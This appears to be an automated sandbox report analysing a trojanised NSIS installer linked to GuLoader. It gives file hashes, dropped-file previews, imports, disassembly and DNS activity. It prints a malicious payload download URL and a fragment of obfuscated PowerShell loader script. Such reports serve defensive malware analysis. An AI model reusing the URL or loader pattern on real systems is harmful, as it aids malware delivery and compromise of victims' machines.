                                        https://www.bookinginfo.asia/pkeZmGiUuTK20.bin)msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://www.bookinginfo.asia/pkeZmGiUuTK20.binJmsiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            No contacted IP infos
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1544504
                                            Start date and time:2024-10-29 14:16:07 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 5m 20s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:11
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:3lH2EWD4wU.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:2f9c0ba283506d8333e4f59b29fbeba3.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@6/13@12/0
                                            EGA Information:
                                            • Successful, ratio: 50%
                                            HCA Information:
                                            • Successful, ratio: 91%
                                            • Number of executed functions: 34
                                            • Number of non-executed functions: 29
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • VT rate limit hit for: 3lH2EWD4wU.exe
                                            TimeTypeDescription
                                            09:17:07API Interceptor36x Sleep call for process: powershell.exe modified
                                            09:18:14API Interceptor574x Sleep call for process: msiexec.exe modified
                                            No context
                                            No context
                                            No context
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\3lH2EWD4wU.exeniceworkingthingswithgreatthingsevengetbackwithgoodnews.htaGet hashmaliciousCobalt Strike, GuLoader, HTMLPhisherBrowse
                                              SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):14744
                                                Entropy (8bit):4.992175361088568
                                                Encrypted:false
                                                SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                MD5:A35685B2B980F4BD3C6FD278EA661412
                                                SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Users\user\Desktop\3lH2EWD4wU.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):452017
                                                Entropy (8bit):2.2907928071456114
                                                Encrypted:false
                                                SSDEEP:3072:nceUkNUxshVME7hU9NU0nFKCOPX7q93VQ/FePcfz4liTx:ceUsHh2B3rGq93a/FePez4lA
                                                MD5:CFC1693292A6FA4423DE4EA6D7214FC4
                                                SHA1:51329C0E29AE97FED5B29734D10C71937B115D40
                                                SHA-256:9EF5DE718A03BB0CFC8036BE061029E47F2B65C7FB97F1F0A38D36EDF04FB9F0
                                                SHA-512:4F292AE045B2FA8A19E3FC2DAD43E6F8C4C16342742F3CDDE1F44BA1B7E7CCB8B36DE639E5EE5338A5DB1D6A35E18C1FA1813C019089953E96D71865AA995779
                                                Malicious:false
                                                Preview:..............IE..........u..C..x......................................... .....L................................C.......................r.........[.$.....o.........6"........w............c..................O........z2r....@........PA................w.......`e.......m..........JaO0.........4...............b.e..V......u.......I...q.........Q.......................W...............................\.B.........5.......................[.......U......q.................c.|...........f..........<...........O.w................................0...........j...............7......!........c.......................................a....C..............................9....>..^......................[........"...............p...2..........................)...............3./.....g...............}o......u.........p...........n...............?..I.............v..........Ng^.........................=.B...................._.................................:................................Rb....Y.............
                                                Process:C:\Users\user\Desktop\3lH2EWD4wU.exe
                                                File Type:ASCII text, with very long lines (4175), with CRLF, LF line terminators
                                                Category:dropped
                                                Size (bytes):71728
                                                Entropy (8bit):5.19475938861983
                                                Encrypted:false
                                                SSDEEP:1536:5/quBkQjhD5zeJ93rzHqxhOH6h3s0fCZZjV/vhVO/SWBtx5:5/quBhj95w9PqCH90aLjJvhNMtP
                                                MD5:2766F86E62C8D61940DC2522F8A82F95
                                                SHA1:CC9A331C8194448233D7B7B557ADF479C971E23A
                                                SHA-256:20D2F9D0C92426D68CADC14CC683EA09985C306B86D6D9C43197C831216A08A0
                                                SHA-512:0C46AD1533CFAA33D1CB1D5D1FB8CED17DA0D8DF8F52943B24F2C6231B2D29BC28E31E85ACD59CC972F09C27CE2626CB1F0FC4807AB3FF9ED548975966756C32
                                                Malicious:true
                                                Preview:$Saling94=$Malingernes;..<#Udryddelsestruet Modsaetningerne Rheinlnderpolkaen Saturnist #>..<#Accorder Skyllerierne Usage Belagt #>..<#Ringbarks Ediths Maladjustment Amyroot Botaniserings byggemodent #>..<#Nephrotomy Dmmekrafts Blesbok Taknemlige Speak Winks snurretoppes #>..<#hustelefoner amphistome Bleeping #>..<#Filmcensuren Semidetached Optoelectronic Echoism Abcess remrk Papirmanuskript #>...$Chivalric = @'.Antraci.Las,ivi$st bharFPe vytruPosturanShapingjT,mposke styrvo=Resurfa$SkibsskDCestriaiCore,atk,astermtBr epsyaUkueligf BistorodeficitnIndvkegeG vernirbookisha shlarib TapeinnBrsinfoiCentr lnLomentugSkis ydsChi pabaFrazie,rDiabro rT mpusfa SpecianHexame gThioaceeSerial mSpringbeElefsfin stinkyt Semi ieIdiotist,ebeset;T.ansna.EarthwofPalaveruEpithecnSalvernc LingvitOperettiOverchaoReprsennUndertr P stdiO K ndervDrs.ioneAfkortnr KongrufScab.iklBrandalyDelmaentUnlovinn Telefoi.ydrodynBalandrgFinanspsAnti ri Eugeosy(Ferriti$ pidskaD DecastiUg.eskakInd jentEduta.naMacrocofMist.keo
                                                Process:C:\Users\user\Desktop\3lH2EWD4wU.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):479
                                                Entropy (8bit):4.245739395890601
                                                Encrypted:false
                                                SSDEEP:6:2BJR4H4EduLCin3GLpsMA5jKGay2gCW5jmWXxaAJhTaR9G4FbIC6YWCY2I1j2y:SReduL5nMKjaEjthaAjSMoD6VH2I1j2y
                                                MD5:DA2B21298D7BAC439CD1EA3AC47F7866
                                                SHA1:1180904256A2CFDED5BBF3EC67E53178AC278C7F
                                                SHA-256:F2CA2632B5FF825BD631092BFB6D71FC4669E0F487FC49B58F4710024F4B89C4
                                                SHA-512:0071008D7FA440509188FD643AE2F5E707CC24A95EC64F419DEE8A3E014B9F2E2BDE40182A07869AF0C0BAE7089AAF89684A6070EC421E79F003E8DC412FF2DA
                                                Malicious:false
                                                Preview:azotemia fainting phycoerythrin stentando jitney colley,vagtmesterens aeolistic samhrigheds bedrifters velkldthed frysetrrede bobbysoxers lemlst letching etaerne..vrelsesanvisningerne stenogrammers cognations bekymret.deklarering chervante sjaskeris radarskrmes biklang servicebureau amerikanererne postcards..titivates taces recelebrated,avanceredes parallelodrome spermatia tidsbestemmer heterogeny shirtinget udflytningens aandssvages videoklub formidlingsindsatses funklede..
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Category:dropped
                                                Size (bytes):738435
                                                Entropy (8bit):7.94919421571998
                                                Encrypted:false
                                                SSDEEP:12288:Mzve08P627lFHqh94GdRwQc6ZvU234p8aHAxPFxImRraIgLNKYJpp/PXpCFWjKIl:cmtPMh94GdRwQcgvvGX+ImRraTLBn0Fo
                                                MD5:2F9C0BA283506D8333E4F59B29FBEBA3
                                                SHA1:23BC0A40B6690DAB55D797E9C35CD82D796B85B1
                                                SHA-256:979268F75B22895FAA5D5B6B39442C8CAA36D325EDEA3FAF7C3D7A81D09041B0
                                                SHA-512:A37AABDA8BE17AA24C854996784974A033F724932CAA8BEA4B036E9C60C08B834610BB0D569BD9D7A6CDEE34B921528F969E5A3970F05DF3387F46B80775CBDB
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 21%
                                                Joe Sandbox View:
                                                • Filename: niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta, Detection: malicious, Browse
                                                • Filename: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsx, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L...9.oZ.................d...|.......2............@..........................p............@.................................4............f...........................................................................................................text....b.......d.................. ..`.rdata..T............h..............@..@.data....U...........|..............@....ndata...................................rsrc....f.......h..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                Process:C:\Users\user\Desktop\3lH2EWD4wU.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):450653
                                                Entropy (8bit):2.2992929640630795
                                                Encrypted:false
                                                SSDEEP:3072:smAcos5/nDh2e3T+ey5w6j6dOaaXYyS44COAHNQ3M:tAcoiEenQ67aYb44yQ3
                                                MD5:913FB8371A4307B3DBC98975306E0FB3
                                                SHA1:4D6128E0B24FFC50F2AB09AC082D22B66ADFE1E6
                                                SHA-256:ACEDFA1D66401EC77F24737E8A4A9657798861330DB267E2F4E59B6B5EEBF179
                                                SHA-512:92A4A07479064BE793F7E3EC1B201BD8EA37058114EBA065D691BF787F16FA8C34AC4FFDDB2CFF8F71C473A0C5756A49A8FDE0BED11B84416D8F718110D70480
                                                Malicious:false
                                                Preview:..........3.D.........d....R..2.......#......................b......I.................B....-.................3..(...E....V................2......................^....n8.......^.........6:........4.....U@.............o.......................................a...{..........H...........)..................}.....[.......................ja.............5........5........W.C.................g.....@........9.....................p..7..........N........................S................."...........................................H4.-...................Q........7............{........96...................N.......................0...........c................................I.....k..........O.............[..........ar.............N...........B.............H.......V...........3..o...........q..|.................................h..........................%.........u......P..g}..............7...................K...&............H..............................G.....|..|......................J..........
                                                Process:C:\Users\user\Desktop\3lH2EWD4wU.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):123513
                                                Entropy (8bit):2.2973556752436455
                                                Encrypted:false
                                                SSDEEP:768:Qk455JVbpGo8b5SqA/5n2xrxWqSwMvldK8ijI/GFX//Q/nDULqAs//6SoA2PpzBq:Ql5/Kb5Sv2W73vldeGwn61As//6/l4
                                                MD5:CE36A2BA6422013091438D568FD65193
                                                SHA1:F20F7B837D70297B37CE212EE4BC8980DB3E5427
                                                SHA-256:053D85EC228282E11A69B40B0775E7D3805FD797DFD4677926610833463118AD
                                                SHA-512:7FD6F978AA9D942C1731B680A1A0573487F66616F57A440E1453AA40F149FCA9FF0C94FF33D089986D1654767676C6463D6103F9788BF1B4AF1996A64C9FDF18
                                                Malicious:false
                                                Preview:.........6e...........................6.....y.................................f..............................................6.......(!.......}..........,L.......................................p..............................l.8..............1.....J...................................................g....................................:..........................k...... ..........................i...0....f..................U....b.x....s.....v...7...........i...L.........f......................l........x.................$........Q.....................a......................f...............................f.)...........................................5..w.....................L................................%..............Y..................................K...a...K.............o5..............N.....I.......*...........V......O...........................u...............................w..,.........!...\..H.................i................J.Y......................W.....).....}..........
                                                Process:C:\Users\user\Desktop\3lH2EWD4wU.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):311522
                                                Entropy (8bit):7.666626729903848
                                                Encrypted:false
                                                SSDEEP:6144:j+7HcBLCB9vKGMtJD68ObAHf5MCTsvkyO6X4aZSpSN7fWmKLXCh++qto3/LeeSjx:j+7HcBLCB9vKGMtJD68ObAHf5MHvh9nO
                                                MD5:BF0AE96B3C32CA698C6492BA09769C91
                                                SHA1:5FB3A2489ADE567DC267D48D46C9A37175B1309F
                                                SHA-256:6BAD1E0AE040D5FFD918DB53F4B146CE35DE2AFAAD296E096C41C3E7DFCB953F
                                                SHA-512:16AFEAC5C98EA19E527920E169AF7D178A117C6D5B5F8E4924C5418D1D7604CE7838868B3444993C32FA33A9177E96921BA08ED16B1A998B294FFBD27B7D3439
                                                Malicious:false
                                                Preview:....m....iii.N.........).ss......................:..$....pp......SSS...........#....!.,........,,....+...........U.........F.......00.....k............^............~........Q...............DDDD.....................F........V...~~.OO...'............,...'''.............F....(....&&&.J......}.F............"""......8............3..........//.....................v................."...33.................jj.bb.D............!.cc.......9.....99........[............___...........``....#.T...............m...xx...a.............s...................+.uuu........................K................=======.V...........L............%%%...............!...............>......V...............p.......................................8....9.......Y.....===..........ww.......!!!!.ddddd.SS..:...........E.....i.....x...UUU..............x.........#...........~~~............AA............................o....ZZ............~..QQQQQQ...........ss........oo.Q.....gg............................................p..........
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.94919421571998
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:3lH2EWD4wU.exe
                                                File size:738'435 bytes
                                                MD5:2f9c0ba283506d8333e4f59b29fbeba3
                                                SHA1:23bc0a40b6690dab55d797e9c35cd82d796b85b1
                                                SHA256:979268f75b22895faa5d5b6b39442c8caa36d325edea3faf7c3d7a81d09041b0
                                                SHA512:a37aabda8be17aa24c854996784974a033f724932caa8bea4b036e9c60c08b834610bb0d569bd9d7a6cdee34b921528f969e5a3970f05df3387f46b80775cbdb
                                                SSDEEP:12288:Mzve08P627lFHqh94GdRwQc6ZvU234p8aHAxPFxImRraIgLNKYJpp/PXpCFWjKIl:cmtPMh94GdRwQcgvvGX+ImRraTLBn0Fo
                                                TLSH:EAF423D9B98532F7E45286B040A8ACB6B2531DAFC9BCA10BC70AB317BD735C6021F557
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...9.oZ.................d...|.....
                                                Icon Hash:3c23436d4d0d1812
                                                Entrypoint:0x40320c
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x5A6FED39 [Tue Jan 30 03:57:45 2018 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:3abe302b6d9a1256e6a915429af4ffd2
                                                Instruction
                                                sub esp, 00000184h
                                                push ebx
                                                push esi
                                                push edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [esp+18h], ebx
                                                mov dword ptr [esp+10h], 0040A198h
                                                mov dword ptr [esp+20h], ebx
                                                mov byte ptr [esp+14h], 00000020h
                                                call dword ptr [004080A0h]
                                                call dword ptr [0040809Ch]
                                                and eax, BFFFFFFFh
                                                cmp ax, 00000006h
                                                mov dword ptr [0042F40Ch], eax
                                                je 00007FF2A4FA6773h
                                                push ebx
                                                call 00007FF2A4FA984Ah
                                                cmp eax, ebx
                                                je 00007FF2A4FA6769h
                                                push 00000C00h
                                                call eax
                                                mov esi, 00408298h
                                                push esi
                                                call 00007FF2A4FA97C6h
                                                push esi
                                                call dword ptr [00408098h]
                                                lea esi, dword ptr [esi+eax+01h]
                                                cmp byte ptr [esi], bl
                                                jne 00007FF2A4FA674Dh
                                                push 0000000Ah
                                                call 00007FF2A4FA981Eh
                                                push 00000008h
                                                call 00007FF2A4FA9817h
                                                push 00000006h
                                                mov dword ptr [0042F404h], eax
                                                call 00007FF2A4FA980Bh
                                                cmp eax, ebx
                                                je 00007FF2A4FA6771h
                                                push 0000001Eh
                                                call eax
                                                test eax, eax
                                                je 00007FF2A4FA6769h
                                                or byte ptr [0042F40Fh], 00000040h
                                                push ebp
                                                call dword ptr [00408044h]
                                                push ebx
                                                call dword ptr [00408288h]
                                                mov dword ptr [0042F4D8h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+38h]
                                                push 00000160h
                                                push eax
                                                push ebx
                                                push 00429830h
                                                call dword ptr [00408178h]
                                                push 0040A188h
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x85340xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x400000x66b8.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x298.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x628f0x640094777a1c66c6303b9367f07906450c26False0.670078125data6.442195364271234IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x80000x13540x14005143a41b917c20afc11d259fd85b6ffcFalse0.4599609375data5.236269898436511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xa0000x255180x60012c02de2bdc517e2722ceeb84aff8b34False0.455078125data4.04938010159809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata0x300000x100000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x400000x66b80x6800e49df56a1c0561685226b68ce9a40022False0.33969350961538464data4.393028705918419IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x402080x5b90Device independent bitmap graphic, 75 x 150 x 32, image size 22500, resolution 3779 x 3779 px/mEnglishUnited States0.31574232081911263
                                                RT_DIALOG0x45d980x120dataEnglishUnited States0.5173611111111112
                                                RT_DIALOG0x45eb80xf8dataEnglishUnited States0.6330645161290323
                                                RT_DIALOG0x45fb00xa0dataEnglishUnited States0.6125
                                                RT_DIALOG0x460500x60dataEnglishUnited States0.7291666666666666
                                                RT_GROUP_ICON0x460b00x14dataEnglishUnited States1.15
                                                RT_VERSION0x460c80x2b0dataEnglishUnited States0.4883720930232558
                                                RT_MANIFEST0x463780x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                DLLImport
                                                KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                                USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                                ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 29, 2024 14:18:15.696867943 CET5837553192.168.2.61.1.1.1
                                                Oct 29, 2024 14:18:15.706840038 CET53583751.1.1.1192.168.2.6
                                                Oct 29, 2024 14:18:19.796988010 CET5324253192.168.2.61.1.1.1
                                                Oct 29, 2024 14:18:19.921226978 CET53532421.1.1.1192.168.2.6
                                                Oct 29, 2024 14:18:24.812746048 CET5424653192.168.2.61.1.1.1
                                                Oct 29, 2024 14:18:24.823158026 CET53542461.1.1.1192.168.2.6
                                                Oct 29, 2024 14:18:29.859250069 CET6117453192.168.2.61.1.1.1
                                                Oct 29, 2024 14:18:29.868659019 CET53611741.1.1.1192.168.2.6
                                                Oct 29, 2024 14:18:34.812494040 CET5600153192.168.2.61.1.1.1
                                                Oct 29, 2024 14:18:34.822526932 CET53560011.1.1.1192.168.2.6
                                                Oct 29, 2024 14:18:39.796499968 CET6201053192.168.2.61.1.1.1
